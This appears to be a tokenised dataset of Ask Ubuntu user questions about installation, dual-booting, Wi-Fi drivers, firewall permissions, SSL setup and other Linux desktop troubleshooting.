411120	ca n't install from bootable usb or iso for ubuntu	booting from usb flashdrive fails in my attempts to replace win7 home premium which has two partitions , c : and d : , on my hard drive . i also attempted the boot from usb ( in all the usb slots i have ) after following all the steps to make a working bootable usb for windows - failed . log file -- the 225kb file at dropbox contains logs from several attempts to install ubuntu .
411125	how do i grant ufw manage access to a particular user ?	i would like to allow a particular user the permission to run `` ufw allow '' ( or equivalent ) . ideally without giving that user the ability to run other privileged commands , or give firewall authority to other users on the machine . how would i go about this ?
411128	( solved ) ssh : connection refused from windows but not from linux	i have an issue when i try connecting to my ubuntu server from local network . when i try to connect from my pc ( static ip ) with win7 and putty , i get network error : connection refused but when i connect from my smartphone , everything is ok . either from my wife 's laptop ( with win7 too ) . how could i resolve ? thanks edit : ok , i 've found the issue . my `` virtualbox host interface '' was set with the same ip of the server ( do n't know why , do n't know how , trust me ) . swithcing it to dhcp gave me back all connectivity . thanks for your help ! ! !
411144	loop that breaks when program closes	how would i check with this command ps aux | grep java to make a while loop that would end if this process is off ? the idea is so if the server , in my case a minecraft server , crashes or closes then the backup stops .
411145	gedit will not start after reboot	here 's how i found the problem . i rebooted the computer , after the installation of a new cd drive . attempted to start gedit from the panel ( cinnamon ) . the icon wiggled , and a box flashed on the screen , then closed . i have already searched to find an answer to this problem . i have done the following after that research : uninstalled gedit ( and ubuntu-desktop ) reboot and install gedit from software center - no joy uninstalled logout and installed ubuntu-desktop from terminal with commands sudo apt-get install ubuntu-desktop sudo apt-get build-dep ubuntu-desktop still no joy : - ( attempts to start gedit in terminal result in this error : ( gedit:23646 ) : glib-gio-error ** : settings schema 'org.gnome.gedit.plugins.restoretabs ' is not installed the number in the parenthesis changes , but the rest of the message has stayed the same through all attempts to fix the problem . i did activate the restore tabs plug-in , a day or two prior to shutting down the computer to install the cd drive . i did not purge when i uninstalled - would like to keep my settings , if possible . if i can edit a setting file , i need to know where to look .
411147	what is the relationship between unity , gnome , gnome 3 , compiz , metacity , and lightdm ?	i am learning about graphical user interfaces in ubuntu and constantly come across different terms , which cause a lot of confusion for me . i have tried reading easy-to-understand tutorials about the relationship between the named packages , but i do n't have a complete picture . lightdm appears as a service on my installation and is a 'window manager ' , how is this related to compiz , which is also a window manager but not a service ? is metacity also a window manager ? then there comes gnome 3 , unity , gnome shell and gnome - all of which seem to be different things . please help me understand the relationship between all this terminology .
411149	install ubuntu on 64-bit pc alongside win7 ; will ubuntu see windows partition ?	acer w/ amd athlon 64 x2 dual core 3800+ 2.00 ghz , 4 gig ram , 32 bit windows 7 , originally built for windows vista . added an nvidia graphics card . 1 tb barracuda hard drive partitioned into 3 , 1 partition [ 201gb ] set aside for ubuntu , win 7 on one and files on the third . i want to put ubuntu 12.04 lts on the empty partition to work alongside windows . am also concerned , as i read that ubuntu 64bit may not see the existing windows installation â especially if it is a 32 bit program . can anyone tell me the safest and most effective means of installation ?
411150	how to connect to wifi on asus f5rl ?	i recently installed ubuntu 12.04.4 lts with xfce 4.10 on my asus f5rl ap033c laptop . when i open nm-connection-editor from the notifications area ( on it the `` enable wireless '' is in grey ) , in the wireless tab there are no networks , same as with wicd network manager . the wifi lid on the laptop stays on all the time and i ca n't control it neither from wicd nor by pressing fn+f2 . firstly , i searched the asus site for drivers , but there were no linux ones . i tried adding to /etc/rc.local the line : echo 1 | tee /sys/devices/platform/asus_laptop/wlan because of those topics , i 've found : 1 , 2 . one strange thing about those is that i changed the line , i was adding from asus-laptop to asus_laptop , because of the already existing folder . that wlan file contained 1 in it , so i edited it to become 0 and the led turned off . i switched it back on , but i still could n't see the list of available networks . i 've also tried : sudo apt-get purge -- remove bcmwl-kernel-source sudo apt-get install linux-firmware-nonfree sudo modprobe b43 because of that topic , but without any effect . when i was searching the net for my laptop characteristics , i 've found that my wireless is integrated 802.11b/g . sudo iwlist scanning returns : wlan0 interface does n't support scanning : network is down lo interface does n't support scanning . eth0 interface does n't support scanning . but there 's an exception - when i first boot my laptop after being shut down it returns : wlan0 no scan results lo interface does n't support scanning . eth0 interface does n't support scanning . sudo lshw -c network returns : *-network disabled description : wireless interface product : ar242x / ar542x wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 00:15 : af:6f:2f : ad width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.8.0-35-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bg resources : irq:16 memory : fa9f0000-fa9fffff *-network description : ethernet interface product : attansic l2 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : a0 serial : 00:1e:8c:73:14 : d3 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl2 driverversion=2.2.3 duplex=full firmware=l2 ip=192.168.55.98 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:40 memory : feac0000-feafffff memory : feaa0000-feabffff unless when i just start my laptop , when it returns : *-network description : wireless interface product : ar242x / ar542x wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 00:15 : af:6f:2f : ad width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.8.0-35-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bg resources : irq:16 memory : fa9f0000-fa9fffff *-network description : ethernet interface product : attansic l2 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : a0 serial : 00:1e:8c:73:14 : d3 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl2 driverversion=2.2.3 duplex=full firmware=l2 ip=192.168.55.98 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:40 memory : feac0000-feafffff memory : feaa0000-feabffff lsusb returns : bus 001 device 003 : id 0bda:0116 realtek semiconductor corp. mass storage device bus 001 device 004 : id 174f:6a31 syntek web cam - asus a8j , f3s , f5r , vx2s , v1s bus 002 device 002 : id 046d : c05b logitech , inc. m-u0004 810-001317 [ b110 optical usb mouse ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub uname -a returns : linux qxp-f5rl 3.8.0-35-generic # 50~precise1-ubuntu smp wed dec 4 17:28:45 utc 2013 i686 i686 i386 gnu/linux dmesg | grep found returns : [ 0.000000 ] found smp mp-table at [ mem 0x000ff780-0x000ff78f ] mapped at [ c00ff780 ] [ 0.120335 ] acpi : no dock devices found . [ 0.148019 ] pnp : pnp acpi : found 10 devices [ 1.180113 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.180297 ] hub 1-0:1.0 : usb hub found [ 1.240054 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.240210 ] hub 2-0:1.0 : usb hub found [ 1.300053 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.300198 ] hub 3-0:1.0 : usb hub found [ 1.360050 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.360195 ] hub 4-0:1.0 : usb hub found [ 1.420053 ] usb usb5 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.420204 ] hub 5-0:1.0 : usb hub found [ 1.480054 ] usb usb6 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.480202 ] hub 6-0:1.0 : usb hub found [ 1.515808 ] isapnp : no plug & play device found [ 1.518825 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 1.700752 ] usb 1-4 : new usb device found , idvendor=0bda , idproduct=0116 [ 2.205672 ] usb 1-7 : new usb device found , idvendor=174f , idproduct=6a31 [ 2.639094 ] usb 2-1 : new usb device found , idvendor=046d , idproduct=c05b [ 10.278986 ] lp : driver loaded but no devices found [ 13.667622 ] ath5k : phy0 : atheros ar2425 chip found ( mac : 0xe2 , phy : 0x70 ) dmesg | grep -i firmware returns nothing . iwconfig returns : wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions . sudo lspci -nn has : 02:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar242x / ar542x wireless network adapter ( pci-express ) [ 168c:001c ] ( rev 01 ) /var/log/udev has : udev [ 13.860291 ] add /devices/pci0000:00/0000:00:04.0/0000:02:00.0/net/wlan0 ( net ) action=add devpath=/devices/pci0000:00/0000:00:04.0/0000:02:00.0/net/wlan0 devtype=wlan id_bus=pci id_mm_candidate=1 id_model_from_database=ar242x / ar542x wireless network adapter ( pci-express ) id_model_id=/sys/devices/pci0000:00/0000:00:04.0/0000:02:00.0 id_vendor_from_database=qualcomm atheros id_vendor_id=0x168c ifindex=3 interface=wlan0 seqnum=1871 subsystem=net udev_log=3 usec_initialized=13860052 it might have something to do with the result of sudo rfkill list all , which changes depending on whether i unplug the ethernet cable or whether i press fn+f2 . i explained exactly how in my comments on olli 's answer .
411155	i just wiped out some firefox preferences , how do i get them back ?	i have cookies set to `` only when i say so '' in firefox , and i just accidentally hit `` remove all sites '' from my list of exceptions . i have n't closed the window yet -- is there a way to get my exceptions list back or is it already wiped ?
411159	installing ubuntu : no os found	ok , so i have some problems with dualbooting . first of all , previously when i downgraded to win7 kind of failed with partitions so had to delete all of them and install directly with win7 partitioning ( while in boot mode ) . so after i created a new partinion for ubuntu , once i launch ubuntu 13.10 it does n't detect that i have win7 installed . already searched for answers but my ui of bios settings looks kind of weird . any suggestions ?
411161	how to access the gui in ubuntu 12.04 while running from a disc ?	i am trying to run ubuntu 12.04 from a disc , without installing it on the hard disk . all i can access is a command line but no graphical interface . the command line is ubuntu @ ubuntu or something similar . how do i get a gui in live mode ?
411165	ubuntu 14.04 daily image query	i am planning to use ubuntu 14.04 alpha build on desktop . i would like to know that , if i keep updating ubuntu 14.04 lts on daily basis , will my os will reach 'stable ' state when the final stable os will be released on april 2014 ? apologies for poor english .
411172	ubuntu touch dual boot uninstallation - rewrote recovery	i have a nexus 4 and recently installed ubuntu touch via the official dual boot tutorial . by mistake , i rewrote the recovery partition with twrp forgetting that it was used by ubuntu touch . my question is : how can i definitely uninstall ubuntu touch partition on my phone now , since the mistake i made ? in my internal storage there is now a folder called `` 0 '' , inside of it there is like a copy of my android root folder , as if i had installed android twice , i do n't know why ( it was n't there before ) . thanks for any help you might give me .
411177	memtest86 tests no errors in test again	i started memtest in first pass it showed 15 errors but i wanted to test again to be deterministic about faulty ram and talk to my laptop shop guy . in this run i am not able to reproduce errors so what should i say to hardware guy . thanks
411178	trying to install amd radeon hd 7450 driver on ubuntu 12.04 ?	i am brand new to ubuntu and have been trying for hours to download this driver . every time i install amd catalyst center i ca n't do anything with it and it gives me an error code . i need to put this driver on their tonight because i 'm supposed to ship it to a customer tomorrow . any help is greatly appreciated .
411185	will ubuntu 12.04 lts run on my gigabyte ga-z87m-d3h motherboard ?	i 'm looking to build a new computer and i want to use ubuntu as my os . i found thi motherboard i am happy , with but when looking through the specifics of the board they state the following : '' due to different linux support condition provided by chipset vendors , please download linux driver from chipset vendors ' website or 3rd party website . '' so my questions is : can anyone tell me if ubuntu will work on this board ?
411188	install ubuntu onto an external hdd then install that hdd in a computer ?	i have a laptop that i set a bios password on and have since forgotten . i decided that i want to install ubuntu onto the computer as the main and only os but ca n't boot from a cd or usb drive and i 've done all i can to reset the bios password and i just can not get it to work . so i 'm wondering if i were to take the hdd out of the laptop and set it up in an external hdd enclosure and format that and install ubuntu onto it from another computer and then put it back in my laptop , if that will work to install it instead of continuing the fiddle wit he bios password . thank you for your help .
411196	filesystem check or mount failed and root password not work	during booting this messages is displayed : filesystem check or mount failed . a maintenance shell will now be started . control-d will terminate this shell and continue booting after re-trying filesystem . give root password for maintenance make control-d repeat the message and none user password works for login . what can i do in order to avoid losing my files ? i tried to use a livecd to copy the files but the system display the messages permissions errors .
411198	efidisk read error w/ dual boot ubuntu 12.04.3 in asus n56j	i 'm installing ubuntu in my asus n56j machine . the idea is that i would have a dual boot machine between windows 8 and linux ubuntu . i 've followed this steps in the bios system , encountered here booting ubuntu12.10 usb on asus x401a win8 under 'security ' disable 'secure boot control' under 'boot ' disable 'fast boot ' , then enable 'launch csm ' , then enable 'launch pxe oprom' save changes and restart . with previous steps , i get that my ubuntu begin to boot for start the installation wizard , but when i finish the installation , i reboot the system and i see the following before appear the grub , the system show me the message : `` error efidisk read error '' when i choose the option ubuntu for enter to ubuntu system , i see the black screen . when i choose windows 8 option loader , i see this message : error : secure boots forbids loading module from ( hd0 , gpt8 ) /boot/grub/ntfs.mod . error : no such device : 48c2b8b4c2b8a798 error : unknown command â´drive map ' . error : invalid efi file path press any key to continue ... this is related to uefi ?
411199	i can connect to wi-fi , but not to the internet ubuntu 13.10	my computer says i am connected to the network , but whenever i open firefox or try to update the connection it does n't work , i am new to ubuntu and just installed it from usb . also i am on single boot . # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback sudo ifconfig eth0 link encap : ethernet hwaddr 08:2e:5f:76:88:2a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth1 link encap : ethernet hwaddr e0:06 : e6:4c : f6:0a inet addr:192.168.254.17 bcast:192.168.254.255 mask:255.255.255.0 inet6 addr : fe80 : :e206 : e6ff : fe4c : f60a/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:81 errors:0 dropped:0 overruns:0 frame:0 tx packets:161 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:13116 ( 13.1 kb ) tx bytes:28128 ( 28.1 b ) interrupt:19 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:96 errors:0 dropped:0 overruns:0 frame:0 tx packets:96 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 texqueuelen:0 rx bytes:7792 ( 7.7 kb ) tx bytes:7792 ( 7.7 kb )
411203	clam tk and sudo freshclam	i have clamtk ! should i set clamtk for manual or automatic updates ? clam says that if my computer is receiving automatic updates then i should set the wizard at automatic i have no idea if my computer is now receiving them automatically or not if i am receiving automatic updates how would i even know that the process was happening ? i rather like checking for updates manually . i can actually see and know that the update process is happening . where and how does 'sudo freshclam ' fit into all this ? when , why and how would i use it ? when would it become unnecessary or worse than that ? frequently when i use 'sudo freshclam ' i get weird messages at the console to the effect that the update process is locked or another clam process is operative . why ? then , later on , if i use 'sudo freshclam ' it works just fine . no problem . why ? what happened to set it right ? all that being said , i like clamtk . unlike commodo antivirus for linux , it actually works ! ! ! it actually notices problems and allows me to quarantine them . i use chrome under ubuntu 12.04 . i know nothing about computers or ubuntu thanks !
411204	icons all messed up for office documents	i have installed ms office on my ubuntu box through playonlinux and have got it very nicely integrated , except for one thing : my icons . this all started after i tried to get ms ' nice ( r ) icons into my ubuntu instead of using the unity icons . fast forward a few weeks ... i have installed kde and can not change the icons , or for that matter , get rid of the ms icons . what i have : what happens when i go into file associations editor : after i select my wanted icon ( wanted one selected ) : after i click ok on the icon chooser : after i hit `` apply '' : i have cleared my caches , done this after rebooting , looked for any files with conflicting names , but i just ca n't get it working how i want it to .
411206	desktop enviroments for ubuntu	does anyone know if canonical will ever release ubuntu with more then one ( unity , which is currently official ) desktop environment like linux mint does ( cinnamon , mate , xfce ) ?
411207	dual booting ubuntu and windows 8 causes realtek audio problem	for a long time i thought it was windows which randomly caused the headphone audio jack to not work randomly but finally i found out the source of the problem . i have a dual boot , windows 8 and ubuntu 13.10 , both 64bit , whenever i boot into ubuntu and then boot back to windows , the audio problem starts , it is very strange problem , i wan na fix it or at least undrestand how could it happen ? how audio on another operating system on another partition , can affect the audio driver behavior on another operating system ? do you think there is a flag or something on the hardware level that ubuntu changes that affects windows ? any suggestion to fix this ? ( some other person also has exactly this problem on tomshardware forums so it is not just me )
411210	windos 8 problem when installing ubuntu 13.10	i have just installed ubuntu 13.10 together with windows 8.1 , and after finishing the installation i could n't get into any of the operating systems . for fixing the error with ubuntu , i have executed the boot-repair . now i can use ubuntu normally . however , i do n't know what to do with windows . when i try to start using windows , a message appears : windows must be repaired . you can not acces the required device or it is not conected . error code : 0xc0000225 you will have to use the recovery tools of your instalation . press enter to try again press f8 for start configuration press esc for firmware uefi configuration press f9 for using a different operating system i have to say that i do n't have the disc containing windows . thanks in advance
411211	is there a way i can revert the creation of a ntfs partition ?	i have a desktop machine ( hp pavilion slimline s5-1020 ) that came with windows 7 and i installed ubuntu 13.10 beside it . used to boot into either os just fine , until i pulled a really stupid trick ( > . < ) what i had before ubuntu 13.10 was my 105 mb system part. , 600 gb c : \ part. , 300 gb extra files part . ( used as shared on my network ) , and the last fraction was hp restoration . in order to install ubuntu , i decided i 'd condense my extra files into a folder on my c : \ part . and use that 300 gb for ubuntu . this setup worked well until i decided i wanted my extra files part . back ... booted into windows 7 , i used easeus partition master to split my 600 gb c : \ part . in half and use the new 300 gb part . as my extra files space . after easeus pm rebooted the system , ran pre-os to set up the partitions , and restarted the system again , i get a message : '' error : file '/boot/grub/i386-pc/normal.mod ' not found . entering rescue mode ... grub rescue > _ '' i have no idea what to do from here and i 'm thinking that if i can delete that new partition and add it back to c : \ , it should work like before and i 'll just get an external hdd to run on my network as file storage . how would i go about deleting my new part . and adding it back to c : \ ? i tried gparted in my liveusb for ubuntu ( from which i installed ) and it ca n't do anything ... it says something about needing the part . to be unmounted ( even though it already appears unmounted ) . is there a way i could `` boot '' easeus pm from a cd and use that to revert back ? would grub rescue help at all ? if so , where can i learn what the grub rescue commands are ? is there some other way of doing this ? all help is appreciated ! thank you , -josh
411213	burg installed , only grub2 loads	i apologize if this question is found elsewhere , but i have already tried to find an answer and do n't know where to look anymore . i am new to ubuntu . my issue is that i installed burg following the instructions in this tutorial . as you can see , instead of running the standard command sudo burg-install `` ( hd0 ) '' the install location is selected during the installation . i just accepted the suggestion that was in the window . trying sudo burg-emu does bring up burg , but if i reboot my system , grub2 comes up and not burg . given that grub2 works just fine , i am about to give up , but i would enjoy the aesthetics of burg .
411216	gnome 3.6 apps in ubuntu 12.04 ?	i updated nautilus to 3.6.3 in my ubuntu installation from here : is there any way to install latest nautilus file manager in ubuntu 12.04 lts . could someone show me how to update the rest of the gnome apps to 3.6.x , i really want the latest speed improvements and other improvements in gnome 3.6 . thanks in advanced ! also i will not use the webupd8 ppa . edit it looks like someone has asked this q before ( how to update from gnome 3.4.1 to 3.6 ? ) but it does n't update all the apps just gnome shell . and also i need this for a project of my own and i 'm doing it in a vm so you do n't need to be concerned that i will be breaking my system as i already have nautilus 3.6 and rhythmbox 2.98 . rhythmbox 2.98 is from the ppa : ricotz/testing ppa and contains the dependencies for gnome 3.6.x in ubuntu 12.04 and i got nautilus from the link above plus the ppa : ricotz/testing ppa
411218	dual boot using a drive caddy	i have a laptop ( dell e6520 ) with a second ssd installed in a drive caddy . windows 7 is installed on the primary drive ( legacy boot ) . the second drive has ubuntu installed ( ubuntu-13.10-desktop-amd64 ) along with an ntfs partition . i used bootrepair to repair common problems . the bios is set to boot from the primary drive . it boots to the selection window and allows selection of either the linux or windows , both of which boot normally . however , i if i pull the drive caddy and put the dvd device back in the system will not boot ( grub rescue ) . from the bootrepair summary , i think the boot process it pointing to grub.cfg on the second drive and thus wo n't boot when that is pulled . http : //paste.ubuntu.com/6733690/ is it possible to put the boot files ( grub.cfg ) on the primary drive and set up the boot process to look there so that i can boot to windows when the dvd device is installed and otherwise select linux or windows when the drive caddy is in ?
411234	how to let ubuntu 13.10 notice wifi signals	i cant find any way to connect to the internet via wifi . in the taskbar , it doesnt say anything about wireless networks , its not even noticing the wifi signals . im connected now through ethernet . how do i connect via wifi ?
411247	ca n't install software ( armory ) - no install option	i 'm trying to create a offline btc wallet using armory . when i go to install it the software center pops up with 'only install this file if you trust the origin '' with an install button that ca n't be selected . i 've tried to install via file > install but that 's not available . i think it may be a permissions issue but i 'm not sure since i 'm new . how can i get around this to install the software ? thanks
411248	what steps are recommended for resolving system crashes and freezes ? ( sorry for low specificity )	i know my question is n't very specific , so i do n't expect a specific answer . ever since i loaded ubuntu 12.04 onto my newly built computer , i 've had tons of frustrations , including application crashes ( i.e . chromium randomly closing ) , graphical freeze-ups ( sometimes i have mouse control , sometimes not , but nothing is clickable ) , random black screens ( only happened once , display went completely black and had to reisub ) , programs refusing to respond ( when the window darkens and the option pops up to kill it ) . i get `` internal error '' popups frequently as well , and they 've been so common i just report them without reading them . i 'm using an nvidia gt 630 , and i 've tried several different drivers , including the built-in recommended ones , the drivers from the x-swat ppa , and nouveau drivers , and i have the same issues either way , but i suspect the issue is driver-related because the same os works flawlessly on my mom 's amd-based computer with integrated graphics . i 'm using a gigabyte b75-d3h mobo with default drivers , and an intel core i5 3570k processor . i have 8 gb of ram , and a 1tb hdd . the system is on the floor , a short carpet , which i 've heard can lead to dust build-up , but i do n't have room on my desk to test that out . the system is less than a month old , and i was having these problems since it first booted up . i 'd love to provide more details , but i honestly have no idea what other details to provide or where to find the info . these issues are pull-your-hair-out frustrating , and thoughts of switching to windows keep coming up ( joking ) . i know you ca n't fix these issues with these details , but what would you recommend i do to get started on tackling these ?
411249	i ca n't install wine 1.4 this comes up every time help !	sudo apt-get install wine1.4-common reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.4-common : depends : wine1.4 ( = 1.4.1-0ubuntu1~precise1~ppa4 ) but it is not installable e : unable to correct problems , you have held broken packages .
411254	13.10 installation desktop	i have been away from unbuntu for a while which may explain my problem . i installed 13.10 and seem to be missing the unity utility as nothing will appear on my desktop . i am probably missing a simple fix , if so could someone point it out ? thanks for your time .
411255	not getting sound to tv via hdmi	in my sound settings dialog box in systems settings i have only two chooses 1. digital output or 2. analog output . you will see in the following answer that was given to another questioner there are four chooses , one that includes an hdmi setting . this box implies this is for the 12.04 os which i have . how do i get this other sound setting dialog box ? i am trying to get sound to my visio tv via an hdmi cable . i have a great picture but no sound . if there is any other help full detailed information please help . i am a novice at this . the four chooses are as follows hdmi/displayport2 digital output ( s/pdif ) headphones analog output - r @ my-ubuntu : ~ $ pactl list short sinks 0 alsa_output.pci-0000_00_01.1.hdmi-stereo module-alsa-card.c s 16le 2ch 44100hz suspended 11 alsa_output.pci-0000_00_14.2.analog-stereo module-alsa-card.c s 16le 2ch 44100hz running - r @ my-ubuntu : ~ $ pactl stat currently in use : 45 blocks containing 223.6 kib bytes total . allocated during whole lifetime : 1250357 blocks containing 1.7 gib bytes total . sample cache size : 11.5 kib server string : unix : /home/r/.pulse/00fe1e469e4e3a7509f366ec00000009-runtime/native library protocol version : 26 server protocol version : 26 is local : yes client index : 16 tile size : 65472 user name : r host name : my-ubuntu server name : pulseaudio server version : 1.1 default sample specification : s16le 2ch 44100hz default channel map : front-left , front-right default sink : alsa_output.pci-0000_00_14.2.analog-stereo default source : alsa_input.usb-akm_ak5370-00-ak5370.analog-mono cookie : 40d9:9199 - r @ my-ubuntu : ~ $ sudo apt-get install pavucontrol [ sudo ] password for r : reading package lists ... done building dependency tree reading state information ... done pavucontrol is already the newest version . the following packages were automatically installed and are no longer required : gir1.2-ubuntuoneui-3.0 lib32gcc1 language-pack-kde-en kde-l10n-engb libubuntuoneui-3.0-1 thunderbird-globalmenu language-pack-kde-en-base use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
411256	have setup https but does n't show my website ?	ok i have set up my ssl certs by adding servername localhost sslengine on sslcertificatefile /etc/ssl/certs/hidden_net.crt sslcertificatekeyfile /etc/ssl/private/myserver.key it did n't work so i removed it and now it does , https : //mysite.com and http : //mysite.com both load different sites/pages http : //mysite.com loads my wordpress install . and https : //mysite.com loads some default page : it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . i can see the problem is ( in my mind that ) the https : // is grabbing the wrong page/site and i need to change it to get/show the wordpress install ? i do n't know how theses things work but that seems to be the problem ? running wordpress on ubuntu 12.10 ( apache2 )
411257	how do i delete a parent directory on ubuntu one ?	i am trying to clean up my ubuntu one , and there are tons of directories i 'd have to go through and manually remove because i ca n't delete the parent directory . is there a way to do this ? right now my only options are 'unshare ' and that does n't even work .
411260	how to change controls in fce ultra	trying find it all day , but nothing , then start read all fceu configuration files and do it myself . want to say it to other fce ultra potential user . first you need to install ghex sudo apt-get install ghex after that open file /home/ youre login /.fceultra/fceu98.cfg whit ghex find line 47 61 6d 65 50 61 64 43 6f 6e 66 69 67 00 20 03 < -- gamepadconfig and modify 47 61 6d 65 50 61 64 43 6f 6e 66 69 67 00 20 03 00 00 00 00 00 00 78 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 7a 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 0d 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 11 01 00 00 00 00 00 00 01 00 00 00 00 00 00 00 12 01 00 00 00 00 00 00 01 00 00 00 00 00 00 00 14 01 00 00 00 00 00 00 01 00 00 00 00 00 00 00 13 01 00 00 00 00 00 00 01 00 '' a '' maps to pc keyboard 'x' '' b '' maps to pc keyboard 'z' '' select '' maps to pc keyboard 'tab' '' enter '' maps to pc keyboard 'enter' '' up '' maps to pc keyboard 'up' '' down '' maps to pc keyboard 'down' '' left '' maps to pc keyboard 'left' '' right '' maps to pc keyboard 'right'
411262	error installing ubuntu server 12.04.3 lts with raid 5 configuration	i have a dell poweredge 2750 that has 8 x 500gb hdd 's . i performed a raid-5 configuration through the bios , essentially leaving me with about 3.3tb of available disk space . i then installed ubuntu server 12.04.3 lts . when the installation was complete and the server rebooted , i received the below error message : error : out of disk . grub rescue > i 'm not sure exactly what i 'm doing wrong , but i believe it has something to do with the way the partitions were created . when given the option for guided or manual partitioning , i chose guided due to my lack of knowledge on the subject . is there something i should change with the partitions ? should i conduct a software raid , as opposed to the hardware raid ? any help would be appreciated .
411263	university wifi quietly disconnects on ar9285	i have trouble with ubuntu 13.10 on my university wifi . i connect , and it works fine for five seconds to five minutes , then the connection quietly disappears . it does not indicate that anything is wrong with the network , no `` connection lost '' , et cetera . it just reports that i am still connected to the network , but does n't actually work . a solution is to disconnect the wifi , then reconnect , giving me a few moments more of working wifi - horribly annoying . wifi stats wpa ( 2 ) enterprise peap authentication - version automatic i have the university .crt certificate installed ; i hear it 's unnecessary mschapv2 inner authentication username ... password ... typically three out of four bars signal strength in my dorm room . other notes lenovo g770 laptop works fine in windows 8 have tried ubuntu 13.04 , linux mint , fedora , all have same problem have tried other cards : atheros rts5139 usb - same problem intel wireless ac 7260hmw minipcie - same problem and lagged my pc horribly ; removed my roommate reports similar issues with a broadcom card i think it worked okay for a month or two when i joined university , only to suddenly begin acting in the mischievous manner i describe , after several fresh reinstalls . i am fairly experienced with linux and have been using it since ubuntu 8 or somewhere along those lines . do you have any ideas ? i 've been stuck using windows and it sucks so bad . i 'm desperate enough to consider buying a router and trying some bridge method ... if nothing else would that work ? lspci output 02:00.0 network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) subsystem : lenovo device 30a1 kernel driver in use : ath9k
411264	reinstalling ubuntu 13.10	i want to reinstall ubuntu 13.10 . after some adjustments , i eliminated some libraries left in black screen after login . so i decided to reinstall the operating system from a live cd . will the data i had from my old user account remain intact as well as the applications that i had installed there ?
411267	installing tools for 3.12 kernel to run perf ?	i 'm running on 3.12.0-5-generic on ec2 . i want to run perf , which is part of the package linux-tools-3.12.0-5-generic , which unfortunately no longer exists , it 's been replaced by kernel version 3.13 . how can i get the tools for 3.12 ? alternatively , what 's the easiest way for me to run perf ?
411269	ubuntu 13.10 black screen with cursor after logging out	when i log out in ubuntu using the gui log out option , often the gui interface disappears and i am left with a black screen or my desktop background and a movable mouse cursor . the system is still responsive ; i can log in via tty1 ( ctrl+alt+f1 ) and perform a safe shutdown however the gui remains unresponsive . i do n't know what causes the problem but it does n't happen all the time . occasionally if the log out process completed and i am returned to the ubuntu login screen , when i log back in i get a `` system problem detected '' notification and some mention of xorg crashing . a bit of background as to what i have done to likely stuff up my ubuntu system : i attempted to install os x on my pc ( unsuccessfully ) and so that i could access the os x files from ubuntu i followed the steps here to change my ubuntu user id . unfortunately this made my user account partially unusable ( did n't appear on login screen , settings/user accounts , etc ) and fingerprint-gui stopped working . reinstalling fingerprint-gui ( including policykit-1-gnome ) with no success ; the fingerprint driver stopped working for some reason . also i have installed bumblebee for nvidia optimus compatibility and that works fine . if possible , i would like to get the log off button to function correctly and actually log off . thanks .
